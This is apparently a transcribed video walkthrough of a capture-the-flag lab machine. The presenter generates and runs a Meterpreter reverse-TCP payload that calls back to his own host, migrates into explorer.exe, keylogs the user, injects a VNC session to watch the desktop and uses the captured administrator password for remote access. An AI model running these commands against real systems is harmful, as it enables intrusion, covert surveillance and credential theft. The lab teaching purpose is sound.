Brown is typing into the computer, or we can, like, set up a VNC thing, look at the desktop, things like that. So let's go take a look at exactly what Dr. Brown is doing, and the easiest way to do this is going to be through Metasploit, because we have to inject ourselves into another process, and process injection in PowerShell is just a big pain, so I'm going to be using Metasploit for this. Let's do msfvenom -p... don't exactly remember the flags... -l payloads to get a payload for this. Let's wait for it to list. I guess while that runs we can say msfdb run, sudo... there we go. windows/x64/meterpreter, okay, see, we just want reverse_tcp; this one is going to be a stageless payload, it's going to make it a lot bigger, so we want just reverse_tcp, like this: msfvenom -p windows/x64/meterpreter/reverse_tcp, then LHOST is equal to 10.10.14.8, LPORT is going to be... we'll do 9001 again. What is it, -f for format, exe, -o for outfile, msf.exe. Did I do this right? Do we make an executable? use multi... see, search handler, use... I think it's multi/handler, listener... exploit/multi/handler. It's been a while since I've touched Metasploit. Okay, show payloads... I just... done, set payload, my bad. -f exe. We have created a 64-bit... awesome. set payload windows/x64/meterpreter/reverse_tcp, set LHOST tun0, set LPORT 9001, run. Let's move msf.exe to www. Let's make sure we have a web server listening so we can download this. Let's just go over into ProgramData, because that's a good spot to write things on Windows. wget http://10.10.14.8:8000/msf.exe. Let's download it. Not found... I'm not in www, there we go. Run this. Sending the stage; we should get a callback. There we go, session one has been opened. So here we are in Meterpreter. If I do bg we can background that. Do I want to interact with it? I'm not used to the output of it actually saying the working directory here. If we do help... sweet. So I'm going to do a ps so we can list all the running processes, and then we just want to migrate into something that is interactive. Normally when doing a keylogger you either want to go into the process you want to monitor yourself or go into explorer.exe. I'm going to choose explorer.exe, so I'm going to migrate into 2288, and again, the reason why we can do this is because... is it getuid? There we go, because we're Dr. Brown and we're going into another Dr. Brown process, right? So if I do migrate we're going to go over into Explorer, and the reason why you may not want to do this is because if you crash Explorer it makes it obvious on the desktop, but normally it just restarts; if you crash Internet Explorer, the Internet Explorer window would just close and maybe it doesn't get noticed. But here we have it started. If I do help there is a keyscan command, so we can either send keystrokes, key events, but we can do a keyscan_start. So let's do keyscan_start, and then whenever we want to get what's on the keyboard, or keylogger, we do a keyscan_dump. So if I do keyscan_dump it's dumping the captured keystrokes; we don't have anything yet. So if this doesn't get anything then I'm going to probably switch over to the Internet Explorer process. Let's see, getpid: I am 2288. Oh, I'm in VMware Tools; I want to get in 2612, I guess. Is it parent process PID? Okay, now, the parent of that VMware Tools process is Explorer. I am in Explorer; this is where I am, and we don't have anything, so I'm thinking maybe you actually have to be on an Explorer for this to work. Let's see, is there a quick way to do VNC?
No. Let's see, search vnc. bg. search vnc: see, vncinject, let's just do this one. set ViewOnly true, that's fine. See, listen for... set LHOST tun0. I thought there'd be an argument to, like, use my session. It's been a while since I've done this. vnc server... what did I do? I did do inject. Maybe there's a post exploit for this: ms... remote vnc, gather, let's see, use post/windows/manage/payload_inject. Okay, this may be better. "Has been moved"; let's just use what it's moved to. Let's see, set payload: this is what I want, I think. Let's see, set payload this, set LHOST tun0, okay, the ID, set SESSION... I think we're at session one, right? sessions -l. Yep, and then we can do set PID 2288, run. Is this going to work? We don't have vncviewer. sudo apt install vncviewer... sudo apt search vnc view... see, maybe this. sudo apt install, hopefully this works. Okay, we now have vncviewer. So it's setting up all the tunnels and we're sending the payload; we should see a vncviewer window pop up soon. But maybe it's not... wonder if it just set my TCP relay on tun0, because I think we just crashed our session. See, vncviewer 127.0.0.1:5900. Oh, nope, we didn't crash it; we have it working. So this is the desktop of the server; we can see them typing things, right? So we have successfully injected VNC, so we know we're halfway there. Let's foreground this. bg... did I kill that? Not sure if I did. So let's see, keyscan_dump. Oh, it was logging; it just took a while, right? We can see them type administrator and then "the best hospital", whatever, a bunch of numbers. So if we do netexec smb 10.10.11.241 -u administrator -p... get logged in, and I want to see them actually start typing. Login failure. Is there no exclamation point? Let's see, I guess we can log into Roundcube as administrator and see, but I think they're about to start typing. Or I was on view only when I hit alt... something's happening that should not be happening. Let's see, let's log in to Roundcube, make sure we have the password. So that's without the exclamation point; we'll do with an exclamation point. See, let's try the very last one. Are these all the same or different? "Connection to storage server failed." There we go. Let's see, what's the difference between this... th3 B... so they're different: this was a lowercase b, so this one was the uppercase. We have it pwned. So we could use just, like, psexec.py, I guess, if we wanted to: 10.10.11.241, administrator@... requesting share, and that's how to do it the intended way, right? So I hope you guys enjoyed that. I always like just snooping in on VNC sessions. Apparently this is not view only; I thought I was in view only mode, but definitely not, because you can see me interacting with the desktop here. So yep, take care guys, I will see you all next time. Actually, that's a lie. As soon as I stopped recording the video we saw the scheduled task start up back again, doing all the typing, so if you wanted to see just what it's doing, we can watch the automated script run and start typing in the password. And if you didn't want to do a keylogger and you did get this VNC session, where maybe you got Chris Brown's password, you could log in through remote desktop, I don't know if Chris Brown can, then you could probably just click on the password field and unmask it, right? So here we see it typing administrator. The latency in this is awful; VNC is not a good conduit for remote administration, because you can just see how slow it is. But we can see all the stuff coming, and as soon as it attempts typing this in I'm going to click that little eye, and then that will unmask what has been typed, right? Let's see, I click this. So this is another way we could have grabbed the password without doing a keylogger, but again, you still need to get VNC up. I guess let's check Chris Brown, if we can remote desktop. What was it, xfreerdp? It's not in this window; I have no idea which pane we did that in. See, where's Chris Brown's password? Dr. Brown... oh, is this Dr. Brown's password? Yeah, Documents, type... what's in here? type ghostscript.bat. Let's see, can you RDP? drbrown RDP, that just fails. xfreerdp 10.10.11.241, drbrown, password, and we can log in through RDP. So if we grab the password then we would be able to get here and unmask... weird, this shows it; I don't see... is it because I'm in RDP that I don't have access to that button? I don't think I've ever experienced that before. Let's see, xfreerdp... /console? Is it just like /console, /admin? Let's try that. We can see it typing in the password, but again we don't have that button to unmask it. I think that's because it knows we're in remote desktop and it's like "I'm not going to give that to you," which is cool; I just didn't know it did that, and those are the things you learn when you just go the extra mile. So with that /admin flag I do have this button now, so I can see it typing. It probably got screwed up because I was clicking when it started typing, but I'm going to take that /admin flag off real quick and I'm going to see if that button exists. It doesn't, so the /admin gives you a console session, and I didn't really think it did anything nowadays, but obviously Explorer behaves a little bit differently when you add that. So, today I learned. Or... we don't have it now? What? So if I refresh the page... did I have it because, like, the page loaded when I was RDP'd? Like, I'm getting even more confused now. Okay, so I have it that way. So I'm going to exit this, let's get rid of admin. Okay, so I guess you just have to have the session open when the input goes over to the password. Yeah, so the input box has to be empty and then you have to be remoted in at that time, because I see it now. I'm going to close out and then we'll open it again, and I'm guessing I won't be able to see it. Yep, can't see it. So that's pretty cool; it's a weird behavior. I don't even know how that's working under the hood, but it is. If you, I guess, remote desktop long enough you would eventually see it type the password, or there's probably some JavaScript you can do to just unmask it yourself. So with that being said, take care all, and I will see you all next time.